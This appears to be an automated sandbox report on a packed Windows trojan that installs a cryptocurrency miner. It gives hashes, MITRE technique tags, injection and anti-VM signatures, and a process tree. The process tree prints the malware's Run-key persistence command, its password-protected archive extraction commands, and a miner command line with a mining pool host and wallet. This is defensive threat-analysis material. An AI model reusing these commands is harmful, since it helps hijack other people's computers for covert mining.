f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4

Analysis

max time kernel
160s
max time network
135s
platform
windows10_x64
resource
win10-en-20211014
submitted
06-12-2021 03:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe
Size

119KB
MD5

015aae43b84cef99e63a6a518ce5ac14
SHA1

64500abb668d2844d2ca239ab80f6a98478af60d
SHA256

f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4
SHA512

133408c310ac19c29168c30b28fe96427e7a4d69fddb4de31c27430af05e318098e6fcb1fd6ca34efabdd7ba70d85acff93cac9351fd82a6a84f651274fb5faa

Score

9^/10

evasion persistence themida upx

Malware Config

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497
Downloads MZ/PE file
Executes dropped EXE 5 IoCs

Processes:

7z.exe7z.exeRegHost.exe7z.exe7z.exe

pid process

2884 7z.exe
1212 7z.exe
1944 RegHost.exe
2376 7z.exe
2584 7z.exe

pid	process
2884	7z.exe
1212	7z.exe
1944	RegHost.exe
2376	7z.exe
2584	7z.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	upx
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	upx

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

bfsvc.exeexplorer.exebfsvc.exeexplorer.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	bfsvc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	bfsvc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	bfsvc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	bfsvc.exe

Loads dropped DLL 4 IoCs

Processes:

7z.exe7z.exe7z.exe7z.exe

pid process

2884 7z.exe
1212 7z.exe
2376 7z.exe
2584 7z.exe

pid	process
2884	7z.exe
1212	7z.exe
2376	7z.exe
2584	7z.exe

Themida packer 17 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.exe	themida
behavioral2/memory/1664-135-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral2/memory/1664-139-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral2/memory/1664-144-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral2/memory/1664-145-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral2/memory/1664-147-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral2/memory/1664-148-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral2/memory/1664-150-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral2/memory/1664-152-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral2/memory/1664-153-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.exe	themida
behavioral2/memory/3824-192-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral2/memory/3824-193-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral2/memory/3824-194-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral2/memory/3824-196-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral2/memory/3824-198-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral2/memory/3824-199-0x0000000140000000-0x00000001402AD000-memory.dmp	themida

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe -FromAutoRun"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe -FromAutoRun"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

bfsvc.exe

pid process

2648 bfsvc.exe
2648 bfsvc.exe

pid	process
2648	bfsvc.exe
2648	bfsvc.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exeRegHost.exe

description	pid	process	target process
PID 988 set thread context of 2648	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	bfsvc.exe
PID 988 set thread context of 1664	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	explorer.exe
PID 1944 set thread context of 1260	1944	RegHost.exe	bfsvc.exe
PID 1944 set thread context of 3824	1944	RegHost.exe	explorer.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

Processes:

explorer.exe

pid	process
1664	explorer.exe
1664	explorer.exe
1664	explorer.exe
1664	explorer.exe
1664	explorer.exe
1664	explorer.exe
1664	explorer.exe
1664	explorer.exe
1664	explorer.exe
1664	explorer.exe
1664	explorer.exe
1664	explorer.exe
1664	explorer.exe
1664	explorer.exe
1664	explorer.exe
1664	explorer.exe
1664	explorer.exe
1664	explorer.exe
1664	explorer.exe
1664	explorer.exe

Suspicious use of AdjustPrivilegeToken 16 IoCs

Processes:

7z.exe7z.exe7z.exe7z.exe

description	pid	process
Token: SeRestorePrivilege	2884	7z.exe
Token: 35	2884	7z.exe
Token: SeSecurityPrivilege	2884	7z.exe
Token: SeSecurityPrivilege	2884	7z.exe
Token: SeRestorePrivilege	1212	7z.exe
Token: 35	1212	7z.exe
Token: SeSecurityPrivilege	1212	7z.exe
Token: SeSecurityPrivilege	1212	7z.exe
Token: SeRestorePrivilege	2376	7z.exe
Token: 35	2376	7z.exe
Token: SeSecurityPrivilege	2376	7z.exe
Token: SeSecurityPrivilege	2376	7z.exe
Token: SeRestorePrivilege	2584	7z.exe
Token: 35	2584	7z.exe
Token: SeSecurityPrivilege	2584	7z.exe
Token: SeSecurityPrivilege	2584	7z.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.execmd.execmd.execmd.exe

description	pid	process	target process
PID 988 wrote to memory of 3744	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	cmd.exe
PID 988 wrote to memory of 3744	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	cmd.exe
PID 3744 wrote to memory of 1012	3744	cmd.exe	reg.exe
PID 3744 wrote to memory of 1012	3744	cmd.exe	reg.exe
PID 988 wrote to memory of 1176	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	cmd.exe
PID 988 wrote to memory of 1176	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	cmd.exe
PID 1176 wrote to memory of 2884	1176	cmd.exe	7z.exe
PID 1176 wrote to memory of 2884	1176	cmd.exe	7z.exe
PID 988 wrote to memory of 3328	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	cmd.exe
PID 988 wrote to memory of 3328	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	cmd.exe
PID 3328 wrote to memory of 1212	3328	cmd.exe	7z.exe
PID 3328 wrote to memory of 1212	3328	cmd.exe	7z.exe
PID 988 wrote to memory of 2648	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	bfsvc.exe
PID 988 wrote to memory of 2648	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	bfsvc.exe
PID 988 wrote to memory of 2648	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	bfsvc.exe
PID 988 wrote to memory of 2648	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	bfsvc.exe
PID 988 wrote to memory of 2648	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	bfsvc.exe
PID 988 wrote to memory of 2648	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	bfsvc.exe
PID 988 wrote to memory of 2648	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	bfsvc.exe
PID 988 wrote to memory of 2648	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	bfsvc.exe
PID 988 wrote to memory of 2648	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	bfsvc.exe
PID 988 wrote to memory of 2648	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	bfsvc.exe
PID 988 wrote to memory of 2648	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	bfsvc.exe
PID 988 wrote to memory of 2648	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	bfsvc.exe
PID 988 wrote to memory of 2648	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	bfsvc.exe
PID 988 wrote to memory of 2648	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	bfsvc.exe
PID 988 wrote to memory of 2648	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	bfsvc.exe
PID 988 wrote to memory of 2648	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	bfsvc.exe
PID 988 wrote to memory of 2648	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	bfsvc.exe
PID 988 wrote to memory of 2648	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	bfsvc.exe
PID 988 wrote to memory of 2648	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	bfsvc.exe
PID 988 wrote to memory of 2648	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	bfsvc.exe
PID 988 wrote to memory of 2648	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	bfsvc.exe
PID 988 wrote to memory of 2648	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	bfsvc.exe
PID 988 wrote to memory of 2648	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	bfsvc.exe
PID 988 wrote to memory of 2648	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	bfsvc.exe
PID 988 wrote to memory of 2648	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	bfsvc.exe
PID 988 wrote to memory of 2648	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	bfsvc.exe
PID 988 wrote to memory of 2648	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	bfsvc.exe
PID 988 wrote to memory of 2648	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	bfsvc.exe
PID 988 wrote to memory of 2648	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	bfsvc.exe
PID 988 wrote to memory of 2648	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	bfsvc.exe
PID 988 wrote to memory of 2648	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	bfsvc.exe
PID 988 wrote to memory of 1664	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	explorer.exe
PID 988 wrote to memory of 1664	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	explorer.exe
PID 988 wrote to memory of 1664	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	explorer.exe
PID 988 wrote to memory of 1664	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	explorer.exe
PID 988 wrote to memory of 1664	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	explorer.exe
PID 988 wrote to memory of 1664	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	explorer.exe
PID 988 wrote to memory of 1664	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	explorer.exe
PID 988 wrote to memory of 1664	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	explorer.exe
PID 988 wrote to memory of 1664	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	explorer.exe
PID 988 wrote to memory of 1664	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	explorer.exe
PID 988 wrote to memory of 1664	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	explorer.exe
PID 988 wrote to memory of 1664	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	explorer.exe
PID 988 wrote to memory of 1664	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	explorer.exe
PID 988 wrote to memory of 1664	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	explorer.exe
PID 988 wrote to memory of 1664	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	explorer.exe
PID 988 wrote to memory of 1664	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	explorer.exe
PID 988 wrote to memory of 1664	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	explorer.exe
PID 988 wrote to memory of 1664	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	explorer.exe
PID 988 wrote to memory of 1664	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	explorer.exe
PID 988 wrote to memory of 1664	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	explorer.exe
PID 988 wrote to memory of 1664	988	SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe	explorer.exe

C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe
"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.GenericKD.38157423.13774.29832.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v RegHost /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe -FromAutoRun"
2⤵
- Suspicious use of WriteProcessMemory
PID:3744

C:\Windows\system32\reg.exe
REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v RegHost /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe -FromAutoRun"
3⤵
- Adds Run key to start application
PID:1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
2⤵
- Suspicious use of WriteProcessMemory
PID:1176

C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2884

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
2⤵
- Suspicious use of WriteProcessMemory
PID:3328

C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1212

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -log 0 -pool etc.2miners.com:1010 -wal 0xb6a83eeeb736661D6B7Bf125926557817a76DA80 -coin etc -worker @EasyMiner_Bot
2⤵
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2648

C:\Windows\explorer.exe
C:\Windows\bfsvc.exe -log 0 -pool etc.2miners.com:1010 -wal 0xb6a83eeeb736661D6B7Bf125926557817a76DA80 -coin etc -worker @EasyMiner_Bot
2⤵
- Checks BIOS information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1664

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1944

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v RegHost /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe -FromAutoRun"
4⤵
PID:2452

C:\Windows\system32\reg.exe
REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v RegHost /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe -FromAutoRun"
5⤵
- Adds Run key to start application
PID:3776

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
4⤵
PID:1728

C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
4⤵
PID:3596

C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2584

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -log 0 -pool etc.2miners.com:1010 -wal 0xb6a83eeeb736661D6B7Bf125926557817a76DA80 -coin etc -worker @EasyMiner_Bot
4⤵
- Checks BIOS information in registry
PID:1260

C:\Windows\explorer.exe
C:\Windows\bfsvc.exe -log 0 -pool etc.2miners.com:1010 -wal 0xb6a83eeeb736661D6B7Bf125926557817a76DA80 -coin etc -worker @EasyMiner_Bot
4⤵
- Checks BIOS information in registry
PID:3824

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EDC238BFF48A31D55A97E1E93892934B_C31B2498754E340573F1336DE607D619
MD5
eb0ca06aa68b351efd9aedd142513d14

SHA1
d89f38d944ec2bf0c356f48de9896b03a42d3255

SHA256
118ba4cece4bec860211a09f28b00b5f4445459ba23def6ed03d7ffb025a7c5f

SHA512
339f37e214b76ad8851b6ad49cbe8a69089f4356ce6869f043ec05894615475c5506569a127d026ecefb2641e43ddefb82d4fc01a9caa7797733ff8b0327e12b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C31B2498754E340573F1336DE607D619
MD5
17177798112b4323dfb1cb399b983684

SHA1
fe0b5d5ec59b89bf6943144df814ab7b4553432c

SHA256
9f200b9a1226b721b5021119305ddb2c0ad30b42aa97a0d1f76f9497f28f269b

SHA512
16ff296e5b69262db1df4b300cc0d8b3f8d10f3e049480bccab103916f04fc9adc1983accf86512aed0dcdeb7d35e0cc1bcf58b2c0158f1c1286d5075f05222b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\1BA3P8U7\7z[1].exe
MD5
86e8388e83be8909d148518cf7b6e083

SHA1
4f7fdcf3abc0169b591e502842be074a5188c2c9

SHA256
4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

SHA512
2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\4DBU0RWN\RegData_Temp[1].zip
MD5
14a4954f51da5cf0d996b9a61dd4c0e5

SHA1
9418d49202324ba8477f5933b7d7480e507c49b9

SHA256
885272ff3bbe2f9503a92e3746d21e3ac78ea01a1e9ff890f750b182af23a5f0

SHA512
d4c2b5b4cdb096f8eeff30e0f53dc321273a196cfadedbf003d41c7fd330bee7290d2f262ed50b1d952136136154141c71169526f5ff46e17a32f9017bfdb5cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\BNAKBOQY\RegHost_Temp[1].zip
MD5
b58884e0aed5e1591fa72febf6dc8d47

SHA1
853e404cad2e662604497d7313ca8aa36cf4e9e1

SHA256
a9f1b987d3b1fb46c6d9ede15027f23c822967b699ce20b01f077faf6fa3e5d4

SHA512
20177c63929049ca80e8e7730858b7f33f3ee3fb76014e5e0c66ccc318747c1f434f77e1811775e13bd8d26e1a847a85cc7b09dce471525ab882da543a9dfe5c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\YT6ZDZWI\7z[1].dll
MD5
42336b5fc6be24babfb87699c858fb27

SHA1
38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

SHA256
b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

SHA512
f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\7z.dll
MD5
42336b5fc6be24babfb87699c858fb27

SHA1
38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

SHA256
b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

SHA512
f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\7z.dll
MD5
42336b5fc6be24babfb87699c858fb27

SHA1
38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

SHA256
b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

SHA512
f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
MD5
86e8388e83be8909d148518cf7b6e083

SHA1
4f7fdcf3abc0169b591e502842be074a5188c2c9

SHA256
4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

SHA512
2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
MD5
86e8388e83be8909d148518cf7b6e083

SHA1
4f7fdcf3abc0169b591e502842be074a5188c2c9

SHA256
4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

SHA512
2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
MD5
86e8388e83be8909d148518cf7b6e083

SHA1
4f7fdcf3abc0169b591e502842be074a5188c2c9

SHA256
4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

SHA512
2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
MD5
86e8388e83be8909d148518cf7b6e083

SHA1
4f7fdcf3abc0169b591e502842be074a5188c2c9

SHA256
4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

SHA512
2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.exe
MD5
31611fc40493d80f33b3dd411aaa4026

SHA1
71004f5959cae1d17caf3604b703b04ea8862316

SHA256
12814babde304defc4acc2593618637b2f505e0b12798842ce2c6f2dc368450c

SHA512
f86e5b67f8e1c90f4c7da319c87759f15f6dc349b466b5b158a0ff5e28abe824423a2a917eb48826e22f2cf414b6d114d44bf96aa7786a7b0e28ccdcc672511e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.exe
MD5
31611fc40493d80f33b3dd411aaa4026

SHA1
71004f5959cae1d17caf3604b703b04ea8862316

SHA256
12814babde304defc4acc2593618637b2f505e0b12798842ce2c6f2dc368450c

SHA512
f86e5b67f8e1c90f4c7da319c87759f15f6dc349b466b5b158a0ff5e28abe824423a2a917eb48826e22f2cf414b6d114d44bf96aa7786a7b0e28ccdcc672511e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip
MD5
14a4954f51da5cf0d996b9a61dd4c0e5

SHA1
9418d49202324ba8477f5933b7d7480e507c49b9

SHA256
885272ff3bbe2f9503a92e3746d21e3ac78ea01a1e9ff890f750b182af23a5f0

SHA512
d4c2b5b4cdb096f8eeff30e0f53dc321273a196cfadedbf003d41c7fd330bee7290d2f262ed50b1d952136136154141c71169526f5ff46e17a32f9017bfdb5cb

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip
MD5
14a4954f51da5cf0d996b9a61dd4c0e5

SHA1
9418d49202324ba8477f5933b7d7480e507c49b9

SHA256
885272ff3bbe2f9503a92e3746d21e3ac78ea01a1e9ff890f750b182af23a5f0

SHA512
d4c2b5b4cdb096f8eeff30e0f53dc321273a196cfadedbf003d41c7fd330bee7290d2f262ed50b1d952136136154141c71169526f5ff46e17a32f9017bfdb5cb

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
015aae43b84cef99e63a6a518ce5ac14

SHA1
64500abb668d2844d2ca239ab80f6a98478af60d

SHA256
f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4

SHA512
133408c310ac19c29168c30b28fe96427e7a4d69fddb4de31c27430af05e318098e6fcb1fd6ca34efabdd7ba70d85acff93cac9351fd82a6a84f651274fb5faa

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
015aae43b84cef99e63a6a518ce5ac14

SHA1
64500abb668d2844d2ca239ab80f6a98478af60d

SHA256
f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4

SHA512
